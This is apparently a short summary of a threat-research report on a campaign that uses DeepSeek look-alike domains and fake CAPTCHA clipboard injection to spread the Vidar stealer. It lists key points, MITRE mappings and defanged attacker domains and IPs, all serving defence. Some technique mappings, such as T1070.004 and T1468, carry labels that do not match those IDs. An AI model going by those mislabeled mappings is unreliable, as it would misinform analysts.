Threat Research

DeepSeek Lure Using CAPTCHAs To Spread Malware

ZScaler
DeepSeek Lure Using CAPTCHAs To Spread Malware

The article discusses a malware campaign exploiting the popularity of the DeepSeek AI chatbot, primarily through brand impersonation. Cybercriminals create fraudulent domains to deliver the Vidar information stealer, utilizing techniques like clipboard injection and leveraging platforms such as Telegram and Steam for command-and-control communication. The rapid evolution of generative AI has made it vulnerable to misuse, highlighting the need for enhanced security measures in organizations. Affected: DeepSeek AI, users, organizations utilizing AI technology

Keypoints :

  • Cybcriminals are exploiting the popularity of DeepSeek’s brand by creating look-alike domains to deceive users.
  • The malware campaign utilizes fake CAPTCHA pages to execute clipboard injections with malicious PowerShell commands.
  • Vidar information stealer is employed to harvest sensitive data, including user credentials and cryptocurrency wallet information.
  • Illegitimate platforms such as Telegram and Steam are leveraged for command-and-control communication.
  • Organizations need stringent policies and controls regarding the use of generative AI tools to mitigate risks.
  • ThreatLabz has identified numerous fraudulent domains impersonating DeepSeek during their investigations.

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: The malware uses Telegram and Steam for command-and-control communication.
  • T1059.001 – PowerShell: The attack executes a malicious PowerShell command through a clipboard injection.
  • T1203 – Exploitation for Client Execution: The campaign exploits user interactions on a deceptive website.
  • T1070.004 – File and Directory Permissions Modification: Manipulating permissions during the execution of Vidar.
  • T1468 – Malware: Deployment of Vidar information stealer to extract sensitive information.

Indicator of Compromise :

  • [Domain] steamcommunity[.]com/profiles/76561199825403037
  • [Domain] t[.]me/b4cha00
  • [IP Address] 77.239.117[.]222
  • [IP Address] 95.216.178[.]57
  • [IP Address] 95.217.246[.]174

Full Story: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint